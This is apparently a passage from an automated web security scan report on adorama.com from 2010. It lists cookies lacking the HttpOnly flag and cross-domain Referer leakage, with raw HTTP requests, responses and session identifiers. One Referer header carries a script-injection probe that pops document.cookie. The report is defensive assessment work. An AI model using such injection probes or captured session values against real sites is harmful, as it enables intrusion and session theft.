Set-Cookie: header_refby=become; expires=Wed, 26-Dec-2040 04:08:53 GMT; path=/
Set-Cookie: Session_Refby=become; path=/


4.2. http://www.adorama.com/ecommerce/showcartsummary.aspx  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.adorama.com
Path:   /ecommerce/showcartsummary.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ecommerce/showcartsummary.aspx?sid=20101225230855189ky HTTP/1.1
Host: www.adorama.com
Proxy-Connection: keep-alive
Referer: http://www.adorama.com/Catalog.tpl?op=itemlist&cat1=Video&cat2=Consumer%20Video&cat3=Camcorders&feature2=HD&12d67%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E2de6d889351=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: header_refby=become; __utmz=113083348.1293336513.1.1.utmcsr=become|utmccn=Other|utmcmd=Others|utmctr=Other; __utma=113083348.1012902736.1293336513.1293336513.1293336513.1; __utmv=113083348.%2FExperiment%2FHPN%2FOld; ci_tid=12420-null-6180938567201011622833183; ci_tag=become; KeepLoggedIn=false; sweeps=T; sid3=20101225230855189ky; il_image_view=yes; ABFlag=89

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
ServerID: 18
X-Powered-By: ASP.NET
Content-Type: text/html; charset=utf-8
Cache-Control: private
X-AspNet-Version: 1.1.4322
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 15:18:48 GMT
Connection: close
Set-Cookie: ASP.NET_SessionId=4n5dtnycmzmtcb45mwnao355; path=/
Set-Cookie: sid3=20101225230855189ky; expires=Wed, 26-Dec-2040 15:18:48 GMT; path=/
Set-Cookie: KeepLoggedIn=false; expires=Wed, 26-Dec-2040 15:18:48 GMT; path=/
Content-Length: 2070


<html>
<head>
<TITLE>Cart Summary</TITLE>
<LINK href="/ECommerce/Components/css/core.css" type="text/css" rel="STYLESHEET">
<script src="/ECommerce/Components/js/core.js" type="text/javascript">
...[SNIP]...

4.3. http://www.adorama.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adorama.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.adorama.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid3=20101225230855189ky; sub=; __utmv=113083348.%2FExperiment%2FHPN%2FOld; e=; __utmz=113083348.1293336513.1.1.utmcsr=become|utmccn=Other|utmcmd=Others|utmctr=Other; Session_Refby=become; l=; ETjobid=; AJAXrefby=; j=; u=; sterm=; refby=; header_refby=become; __utma=113083348.1012902736.1293336513.1293336513.1293336513.1; mid=; KeepLoggedIn=false; ABFlag=89; __utmc=113083348; ci_tag=become; __utmb=113083348.2.10.1293336513; ci_tid=12420-null-6180938567201011622833183;

Response

HTTP/1.1 200 OK
Expires: Sun, 26 Dec 2010 04:31:25 GMT
Mime-Version: 1.0
Content-Type: text/html
Date: Sun, 26 Dec 2010 04:31:25 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: sid3=20101225230855189ky; expires=Wednesday, 09-Nov-2200 23:12:40 GMT; path=/
Set-Cookie: ABFlag=89; expires=Wednesday, 09-Nov-2200 23:12:40 GMT; path=/;
Set-Cookie: sweeps=T;
Content-Length: 62413

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
                   
                   
                                       
...[SNIP]...

4.4. http://www.adorama.com/SearchSite/AjaxHelperService.asmx/LoadDispatcher  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adorama.com
Path:   /SearchSite/AjaxHelperService.asmx/LoadDispatcher

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /SearchSite/AjaxHelperService.asmx/LoadDispatcher HTTP/1.1
Host: www.adorama.com
Proxy-Connection: keep-alive
Referer: http://www.adorama.com/ICA1DM4.html?utm_term=Other&utm_medium=Others&utm_campaign=Other&utm_source=become
Origin: http://www.adorama.com
X-Requested-With: XMLHttpRequest
Content-Type: application/json; charset=UTF-8
Accept: application/json, text/javascript, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AJAXrefby=become; header_refby=become; Session_Refby=become; ABFlag=89; sub=; sterm=; refby=; ETjobid=; __utmz=113083348.1293336513.1.1.utmcsr=become|utmccn=Other|utmcmd=Others|utmctr=Other; __utma=113083348.1012902736.1293336513.1293336513.1293336513.1; __utmc=113083348; __utmv=113083348.%2FExperiment%2FHPN%2FOld; __utmb=113083348.2.10.1293336513; ci_tid=12420-null-6180938567201011622833183; ci_tag=become
Content-Length: 2

{}

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
ServerID: 16
X-Powered-By: ASP.NET
Content-Type: application/json; charset=utf-8
Cache-Control: private, max-age=0
Content-Length: 377
X-AspNet-Version: 2.0.50727
Date: Sun, 26 Dec 2010 04:08:54 GMT
Connection: close
Set-Cookie: sid3=20101225230855189ky; expires=Wed, 26-Dec-2040 04:08:55 GMT; path=/
Set-Cookie: KeepLoggedIn=false; expires=Wed, 26-Dec-2040 04:08:55 GMT; path=/
Set-Cookie: AJAXrefby=; path=/
Set-Cookie: mid=; path=/
Set-Cookie: j=; path=/
Set-Cookie: e=; path=/
Set-Cookie: l=; path=/
Set-Cookie: u=; path=/

{"d":{"__type":"Legacy_User.SessionData","SID":"20101225230855189ky","Email_Addr":"","Cust_ID":"","Name":" ","EmailPrice":false,"Effective_Cart_ID":"20101225230855189ky","HasCookies":false,"Display_Ph
...[SNIP]...

4.5. http://www.adorama.com/alc/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adorama.com
Path:   /alc/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /alc/ HTTP/1.1
Host: www.adorama.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid3=20101225230855189ky; sub=; __utmv=113083348.%2FExperiment%2FHPN%2FOld; e=; __utmz=113083348.1293336513.1.1.utmcsr=become|utmccn=Other|utmcmd=Others|utmctr=Other; Session_Refby=become; l=; ETjobid=; AJAXrefby=; j=; u=; sterm=; refby=; header_refby=become; __utma=113083348.1012902736.1293336513.1293336513.1293336513.1; mid=; KeepLoggedIn=false; ABFlag=89; __utmc=113083348; ci_tag=become; __utmb=113083348.2.10.1293336513; ci_tid=12420-null-6180938567201011622833183;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Pragma: no-cache
Server: Microsoft-IIS/6.0
Expires: -1
ServerID: 5
X-Powered-By: ASP.NET
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
X-AspNet-Version: 2.0.50727
Date: Sun, 26 Dec 2010 04:33:32 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ASP.NET_SessionId=ejs4jy45twoamg45mtedxz45; path=/; HttpOnly
Set-Cookie: sid3=20101225230855189ky; expires=Wed, 26-Dec-2040 04:33:32 GMT; path=/
Set-Cookie: KeepLoggedIn=false; expires=Wed, 26-Dec-2040 04:33:32 GMT; path=/
Content-Length: 98406


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<!-- -->

...[SNIP]...

4.6. http://www.adorama.com/catalog.tpl  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adorama.com
Path:   /catalog.tpl

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /catalog.tpl HTTP/1.1
Host: www.adorama.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid3=20101225230855189ky; sub=; __utmv=113083348.%2FExperiment%2FHPN%2FOld; e=; __utmz=113083348.1293336513.1.1.utmcsr=become|utmccn=Other|utmcmd=Others|utmctr=Other; Session_Refby=become; l=; ETjobid=; AJAXrefby=; j=; u=; sterm=; refby=; header_refby=become; __utma=113083348.1012902736.1293336513.1293336513.1293336513.1; mid=; KeepLoggedIn=false; ABFlag=89; __utmc=113083348; ci_tag=become; __utmb=113083348.2.10.1293336513; ci_tid=12420-null-6180938567201011622833183;

Response

HTTP/1.1 200 OK
Expires: Sun, 26 Dec 2010 04:31:29 GMT
Mime-Version: 1.0
Content-Type: text/html
Date: Sun, 26 Dec 2010 04:31:29 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: sid3=20101225230855189ky; expires=Wednesday, 09-Nov-2200 23:12:40 GMT; path=/
Set-Cookie: ABFlag=89; expires=Wednesday, 09-Nov-2200 23:12:40 GMT; path=/;
Set-Cookie: sweeps=T;
Content-Length: 62413

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
                   
                   
                                       
...[SNIP]...

4.7. http://www.adorama.com/refby.tpl  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adorama.com
Path:   /refby.tpl

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /refby.tpl HTTP/1.1
Host: www.adorama.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid3=20101225230855189ky; sub=; __utmv=113083348.%2FExperiment%2FHPN%2FOld; e=; __utmz=113083348.1293336513.1.1.utmcsr=become|utmccn=Other|utmcmd=Others|utmctr=Other; Session_Refby=become; l=; ETjobid=; AJAXrefby=; j=; u=; sterm=; refby=; header_refby=become; __utma=113083348.1012902736.1293336513.1293336513.1293336513.1; mid=; KeepLoggedIn=false; ABFlag=89; __utmc=113083348; ci_tag=become; __utmb=113083348.2.10.1293336513; ci_tid=12420-null-6180938567201011622833183;

Response

HTTP/1.1 301 Moved Permanently
Expires: Sun, 26 Dec 2010 04:31:21 GMT
Location: catalog.tpl?utm_source=&utm_medium=Others&utm_campaign=Home&utm_term=Home
Mime-Version: 1.0
Content-Length: 2
Date: Sun, 26 Dec 2010 04:31:21 GMT
Connection: close
Set-Cookie: refby=; expires=Monday, 24-Jan-2011 04:31:21;
Set-Cookie: sub=;
Set-Cookie: sterm=[sterm];
Set-Cookie: header_refby=; expires=Wednesday, 23-Feb-2011 04:31:21;
Set-Cookie: sid3=20101225230855189ky; expires=Wednesday, 09-Nov-2200 23:12:40 GMT; path=/
Set-Cookie: Session_Refby=;
Set-Cookie: ABFlag=89; expires=Wednesday, 09-Nov-2200 23:12:40 GMT; path=/;



5. Cross-domain Referer leakage  previous  next
There are 9 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


5.1. http://www.adorama.com/Catalog.tpl  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adorama.com
Path:   /Catalog.tpl

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /Catalog.tpl?op=itemlist&cat1=Cameras%20%26%20Lenses&cat2=Digital%20Cameras%20%26%20Accessories&cat3=Digital%20Cameras&feature3=Point%20%26%20Shoot%20with%20Fixed%20Lens&feature3=Point%20%26%20Shoot%20with%20Interchangeable%20Lens&feature3=Point%20%26%20Shoot%20with%20Zoom%20Lens HTTP/1.1
Host: www.adorama.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid3=20101225230855189ky; sub=; __utmv=113083348.%2FExperiment%2FHPN%2FOld; e=; __utmz=113083348.1293336513.1.1.utmcsr=become|utmccn=Other|utmcmd=Others|utmctr=Other; Session_Refby=become; l=; ETjobid=; AJAXrefby=; j=; u=; sterm=; refby=; header_refby=become; __utma=113083348.1012902736.1293336513.1293336513.1293336513.1; mid=; KeepLoggedIn=false; ABFlag=89; __utmc=113083348; ci_tag=become; __utmb=113083348.2.10.1293336513; ci_tid=12420-null-6180938567201011622833183;

Response

HTTP/1.1 200 OK
Expires: Sun, 26 Dec 2010 04:31:45 GMT
Mime-Version: 1.0
Content-Type: text/html
Date: Sun, 26 Dec 2010 04:31:45 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: sweeps=T
Set-Cookie: sid3=20101225230855189ky; expires=Wednesday, 09-Nov-2200 23:12:40 GMT; path=/
Set-Cookie: il_image_view=yes; expires=Wednesday, 09-Nov-2200 23:12:40 GMT; path=/
Set-Cookie: ABFlag=89; expires=Wednesday, 09-Nov-2200 23:12:40 GMT; path=/
Content-Length: 195567

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


               
...[SNIP]...
</a><a href="http://www.adoramapix.com/?sid=20101225230855189ky" id="pix" onClick="_gaq.push(['_trackEvent', 'banner', 'TopPix']);"><img src="/artworks2/topnav_pix.gif" alt="Visit AdoramaPix for online photo sharing and digital photo printing create harcover photo books">
...[SNIP]...
<li>
           <a id="pixInNav" href="http://www.adoramapix.com?sid=20101225230855189ky">Professional Prints</a>
...[SNIP]...
<div><a href="http://www.adoramapix.com?sid=20101225230855189ky">Order Prints Online</a>
...[SNIP]...
<div><a href="http://www.adoramapix.com/products/photo-books?sid=20101225230855189ky"><strong>
...[SNIP]...
<li><a href="http://www.adoramarentals.com/" target="_blank">Rental Department </a>
...[SNIP]...
<li><a href="http://www.cellstores.com/mobile/?r=adorama" target="_blank">Wireless Phones & Plans </a>
...[SNIP]...
<br>
<a target="_blank" href="//www.scanalert.com/RatingVerify?ref=www.adorama.com" onClick="_gaq.push(['_trackEvent', 'banner', 'ScanAlert']);"><img width="94" height="54" border="0" src="//images.scanalert.com/meter/www.adorama.com/23.gif" alt="HACKER SAFE certified sites prevent over 99.9% of hacker crime." oncontextmenu="alert('Copying Prohibited by Law - HACKER SAFE is a Trademark of ScanAlert'); return false;"></a><br><br>
<a href="http://www.bbbonline.org/cks.asp?id=121000109" target="_blank" rel="nofollow"><img src="/artworks2/bbbseal3.gif" border="0" alt="BBB Logo">
...[SNIP]...
<!-- BEGIN: BizRate Medal (125x73 pixels) -->
<a href="http://www.bizrate.com/ratings_guide/cust_reviews__mid--22495.html" target="_blank">
<img src="//medals.bizrate.com/medals/dynamic/22495_medal.gif" alt="BizRate Customer Certified (GOLD) Site - Adorama Reviews at Bizrate" width="125" height="73" align="top" border="0" ></a>
...[SNIP]...
<br><a href="http://syndicate.tentoe.com/Syndicate/SynMaster?ttpid=TTPID-22A-268&vsr_sku=ICAG11" onClick="window.open('http://syndicate.tentoe.com/Syndicate/SynMaster?ttpid=TTPID-22A-268&vsr_sku=ICAG11', 'popup','width=500,height=400,resizable=1');return false;" target="new"><img src="artworks2/Product_Tour.gif" border="0" >
...[SNIP]...
<br><a href="http://syndicate.tentoe.com/Syndicate/SynMaster?ttpid=TTPID-22A-268&vsr_sku=ICAG12" onClick="window.open('http://syndicate.tentoe.com/Syndicate/SynMaster?ttpid=TTPID-22A-268&vsr_sku=ICAG12', 'popup','width=500,height=400,resizable=1');return false;" target="new"><img src="artworks2/Product_Tour.gif" border="0" >
...[SNIP]...
<br><a href="http://syndicate.tentoe.com/Syndicate/SynMaster?ttpid=TTPID-22A-268&vsr_sku=ICAG12A" onClick="window.open('http://syndicate.tentoe.com/Syndicate/SynMaster?ttpid=TTPID-22A-268&vsr_sku=ICAG12A', 'popup','width=500,height=400,resizable=1');return false;" target="new"><img src="artworks2/Product_Tour.gif" border="0" >
...[SNIP]...
<br><a href="http://syndicate.tentoe.com/Syndicate/SynMaster?ttpid=TTPID-22A-268&vsr_sku=ICAG12B" onClick="window.open('http://syndicate.tentoe.com/Syndicate/SynMaster?ttpid=TTPID-22A-268&vsr_sku=ICAG12B', 'popup','width=500,height=400,resizable=1');return false;" target="new"><img src="artworks2/Product_Tour.gif" border="0" >
...[SNIP]...
<br><a href="http://syndicate.tentoe.com/Syndicate/SynMaster?ttpid=TTPID-22A-268&vsr_sku=ICAD10" onClick="window.open('http://syndicate.tentoe.com/Syndicate/SynMaster?ttpid=TTPID-22A-268&vsr_sku=ICAD10', 'popup','width=500,height=400,resizable=1');return false;" target="new"><img src="artworks2/Product_Tour.gif" border="0" >
...[SNIP]...
<br><a href="http://syndicate.tentoe.com/Syndicate/SynMaster?ttpid=TTPID-22A-268&vsr_sku=ICAD10KN" onClick="window.open('http://syndicate.tentoe.com/Syndicate/SynMaster?ttpid=TTPID-22A-268&vsr_sku=ICAD10KN', 'popup','width=500,height=400,resizable=1');return false;" target="new"><img src="artworks2/Product_Tour.gif" border="0" >
...[SNIP]...
<br><a href="http://syndicate.tentoe.com/Syndicate/SynMaster?ttpid=TTPID-22A-268&vsr_sku=ICASD780BKR" onClick="window.open('http://syndicate.tentoe.com/Syndicate/SynMaster?ttpid=TTPID-22A-268&vsr_sku=ICASD780BKR', 'popup','width=500,height=400,resizable=1');return false;" target="new"><img src="artworks2/Product_Tour.gif" border="0" >
...[SNIP]...
<br><a href="http://syndicate.tentoe.com/Syndicate/SynMaster?ttpid=TTPID-22A-268&vsr_sku=ICASD780BKRN" onClick="window.open('http://syndicate.tentoe.com/Syndicate/SynMaster?ttpid=TTPID-22A-268&vsr_sku=ICASD780BKRN', 'popup','width=500,height=400,resizable=1');return false;" target="new"><img src="artworks2/Product_Tour.gif" border="0" >
...[SNIP]...
<br><a href="http://syndicate.tentoe.com/Syndicate/SynMaster?ttpid=TTPID-22A-268&vsr_sku=ICASD780RDR" onClick="window.open('http://syndicate.tentoe.com/Syndicate/SynMaster?ttpid=TTPID-22A-268&vsr_sku=ICASD780RDR', 'popup','width=500,height=400,resizable=1');return false;" target="new"><img src="artworks2/Product_Tour.gif" border="0" >
...[SNIP]...
<br><a href="http://syndicate.tentoe.com/Syndicate/SynMaster?ttpid=TTPID-22A-268&vsr_sku=ICASD970R" onClick="window.open('http://syndicate.tentoe.com/Syndicate/SynMaster?ttpid=TTPID-22A-268&vsr_sku=ICASD970R', 'popup','width=500,height=400,resizable=1');return false;" target="new"><img src="artworks2/Product_Tour.gif" border="0" >
...[SNIP]...
<br><a href="http://syndicate.tentoe.com/Syndicate/SynMaster?ttpid=TTPID-22A-268&vsr_sku=ICASD970RA" onClick="window.open('http://syndicate.tentoe.com/Syndicate/SynMaster?ttpid=TTPID-22A-268&vsr_sku=ICASD970RA', 'popup','width=500,height=400,resizable=1');return false;" target="new"><img src="artworks2/Product_Tour.gif" border="0" >
...[SNIP]...
<br><a href="http://syndicate.tentoe.com/Syndicate/SynMaster?ttpid=TTPID-22A-268&vsr_sku=ICASD940BK" onClick="window.open('http://syndicate.tentoe.com/Syndicate/SynMaster?ttpid=TTPID-22A-268&vsr_sku=ICASD940BK', 'popup','width=500,height=400,resizable=1');return false;" target="new"><img src="artworks2/Product_Tour.gif" border="0" >
...[SNIP]...
<br><a href="http://syndicate.tentoe.com/Syndicate/SynMaster?ttpid=TTPID-22A-268&vsr_sku=ICASD940BL" onClick="window.open('http://syndicate.tentoe.com/Syndicate/SynMaster?ttpid=TTPID-22A-268&vsr_sku=ICASD940BL', 'popup','width=500,height=400,resizable=1');return false;" target="new"><img src="artworks2/Product_Tour.gif" border="0" >
...[SNIP]...
<br><a href="http://syndicate.tentoe.com/Syndicate/SynMaster?ttpid=TTPID-22A-268&vsr_sku=ICASD980BL" onClick="window.open('http://syndicate.tentoe.com/Syndicate/SynMaster?ttpid=TTPID-22A-268&vsr_sku=ICASD980BL', 'popup','width=500,height=400,resizable=1');return false;" target="new"><img src="artworks2/Product_Tour.gif" border="0" >
...[SNIP]...
<br><a href="http://syndicate.tentoe.com/Syndicate/SynMaster?ttpid=TTPID-22A-268&vsr_sku=ICASD980BLR" onClick="window.open('http://syndicate.tentoe.com/Syndicate/SynMaster?ttpid=TTPID-22A-268&vsr_sku=ICASD980BLR', 'popup','width=500,height=400,resizable=1');return false;" target="new"><img src="artworks2/Product_Tour.gif" border="0" >
...[SNIP]...
<br><a href="http://syndicate.tentoe.com/Syndicate/SynMaster?ttpid=TTPID-22A-268&vsr_sku=ICASD980SLR" onClick="window.open('http://syndicate.tentoe.com/Syndicate/SynMaster?ttpid=TTPID-22A-268&vsr_sku=ICASD980SLR', 'popup','width=500,height=400,resizable=1');return false;" target="new"><img src="artworks2/Product_Tour.gif" border="0" >
...[SNIP]...
<br><a href="http://syndicate.tentoe.com/Syndicate/SynMaster?ttpid=TTPID-22A-268&vsr_sku=ICASD980SLRA" onClick="window.open('http://syndicate.tentoe.com/Syndicate/SynMaster?ttpid=TTPID-22A-268&vsr_sku=ICASD980SLRA', 'popup','width=500,height=400,resizable=1');return false;" target="new"><img src="artworks2/Product_Tour.gif" border="0" >
...[SNIP]...
<br><a href="http://syndicate.tentoe.com/Syndicate/SynMaster?ttpid=TTPID-22A-268&vsr_sku=ICASD980PR" onClick="window.open('http://syndicate.tentoe.com/Syndicate/SynMaster?ttpid=TTPID-22A-268&vsr_sku=ICASD980PR', 'popup','width=500,height=400,resizable=1');return false;" target="new"><img src="artworks2/Product_Tour.gif" border="0" >
...[SNIP]...
<br><a href="http://syndicate.tentoe.com/Syndicate/SynMaster?ttpid=TTPID-22A-268&vsr_sku=ICASD980PRR" onClick="window.open('http://syndicate.tentoe.com/Syndicate/SynMaster?ttpid=TTPID-22A-268&vsr_sku=ICASD980PRR', 'popup','width=500,height=400,resizable=1');return false;" target="new"><img src="artworks2/Product_Tour.gif" border="0" >
...[SNIP]...
<li class="footerCategoryHead pixCategory"><a href="http://www.adoramapix.com/">AdoramaPix</a>
...[SNIP]...
<li><a href="http://www.adoramapix.com/products/prints">Digital Prints</a>
...[SNIP]...
<li><a href="http://www.adoramapix.com/products/photo-books">Photo Books</a>
...[SNIP]...
<div id="footerSocialStrip">
<a href="http://twitter.com/adorama" class="followTwiter" target="blank">Follow us on twitter</a>
<a href="http://www.facebook.com/Adorama" class="followFacebook" target="blank">Become a fan</a>
<a href="http://www.youtube.com/user/adoramaTV" class="followYouTube" target="blank">Whatch us on you tube</a>
...[SNIP]...

5.2. http://www.adorama.com/ICA1DM4.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adorama.com
Path:   /ICA1DM4.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /ICA1DM4.html?utm_term=Other&utm_medium=Others&utm_campaign=Other&utm_source=become HTTP/1.1
Host: www.adorama.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AJAXrefby=become; sterm=; refby=become; header_refby=become; Session_Refby=become

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
ServerID: 4
X-Powered-By: ASP.NET
Content-Type: text/html; charset=utf-8
Cache-Control: private
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 04:08:53 GMT
Connection: close
Set-Cookie: ABFlag=89; expires=Wed, 26-Dec-2040 04:08:51 GMT; path=/
Set-Cookie: sub=; path=/
Set-Cookie: sterm=; path=/
Set-Cookie: refby=; path=/
Set-Cookie: ETjobid=; path=/
Content-Length: 91600

<div style="display: none">products page hidden div</div>


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml
...[SNIP]...
</script>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js" type="text/javascript"></script>
...[SNIP]...
</a>
<a href="http://www.adoramapix.com" id="pix" class="pixsid">
<img src="http://www.adorama.com/artworks2/topnav_pix.gif" alt="AdoramaPix" />
...[SNIP]...
<li>
           <a id="pixInNav" href="http://www.adoramapix.com" class="pixsid">Professional Prints</a>
...[SNIP]...
<div><a href="http://www.adoramapix.com" class="pixsid">Order Prints Online</a>
...[SNIP]...
<div><a href="http://www.adoramapix.com/products/photo-books" class="pixsid"><strong>
...[SNIP]...
<li><a href="http://www.adoramarentals.com/" target="_blank">Rental Department </a>
...[SNIP]...
<li><a href="http://www.cellstores.com/mobile/?r=adorama" target="_blank">Wireless Phones & Plans </a>
...[SNIP]...
<br>
<a target="_blank" href="//www.scanalert.com/RatingVerify?ref=www.adorama.com" onClick="_gaq.push(['_trackEvent', 'banner', 'ScanAlert']);"><img width="94" height="54" border="0" src="//images.scanalert.com/meter/www.adorama.com/23.gif" alt="HACKER SAFE certified sites prevent over 99.9% of hacker crime." oncontextmenu="alert('Copying Prohibited by Law - HACKER SAFE is a Trademark of ScanAlert'); return false;"></a><br><br>
<a href="http://www.bbbonline.org/cks.asp?id=121000109" target="_blank" rel="nofollow"><img src="http://www.adorama.com/artworks2/bbbseal3.gif" border="0" alt="BBB Logo">
...[SNIP]...
<!-- BEGIN: BizRate Medal (125x73 pixels) -->
<a href="http://www.bizrate.com/ratings_guide/cust_reviews__mid--22495.html" target="_blank">
<img src="//medals.bizrate.com/medals/dynamic/22495_medal.gif" alt="BizRate Customer Certified (GOLD) Site - Adorama Reviews at Bizrate" width="125" height="73" align="top" border="0" ></a>
...[SNIP]...
<font color="#CC0000"><a href='https://server.iad.liveperson.net/hc/12511569/?cmd=file&file=visitorWantsToChat&site=12511569&byhref=1&SESSIONVAR!skill=Adorama%20Camera%20Sales/costumer%20service&imageUrl=https://www.adorama.com/artworks2/liveperson' target='chat12511569' onClick="javascript:window.open('https://server.iad.liveperson.net/hc/12511569/?cmd=file&file=visitorWantsToChat&site=12511569&SESSIONVAR!skill=Adorama%20Camera%20Sales/costumer%20service&imageUrl=https://www.adorama.com/artworks2&referrer='+escape(document.location),'chat12511569','width=472,height=320');return false;" ><img src='https://server.iad.liveperson.net/hc/12511569/?cmd=repstate&site=12511569&channel=web&&ver=1&imageUrl=https://www.adorama.com/artworks2/liveperson&skill=Adorama%20Camera%20Sales/costumer%20service' name='hcIcon' border=0></a>
...[SNIP]...
</script>
<a href="http://www.addthis.com/bookmark.php" onmouseover="return addthis_open(this, '', addUrl, addTitle)" onmouseout="addthis_close()" onclick="return addthis_sendto()"><img src="http://s9.addthis.com/button1-addthis.gif" width="125" height="16" border="0" alt="" /></a>
...[SNIP]...
</div>
       

        <script src="http://content.webcollage.net/adorama/smart-button"></script>
...[SNIP]...
<p>
        <a id="VideoLink" onclick="window.open('http://syndicate.tentoe.com/Syndicate/SynMaster?ttpid=TTPID-22A-268&amp;vsr_sku=ICA1DM4', 'popup','width=500,height=400,resizable=1');return false;" href="http://syndicate.tentoe.com/Syndicate/SynMaster?ttpid=TTPID-22A-268&amp;vsr_sku=ICA1DM4" target="New"><img src="http://www.adorama.com/artworks2/Product_Tour.gif" width="117" height="23" border="0" />
...[SNIP]...
<li class="footerCategoryHead pixCategory"><a href="http://www.adoramapix.com/">AdoramaPix</a>
...[SNIP]...
<li><a href="http://www.adoramapix.com/products/prints">DigitalPrints</a>
...[SNIP]...
<li><a href="http://www.adoramapix.com/products/photo-books">PhotoBooks</a>
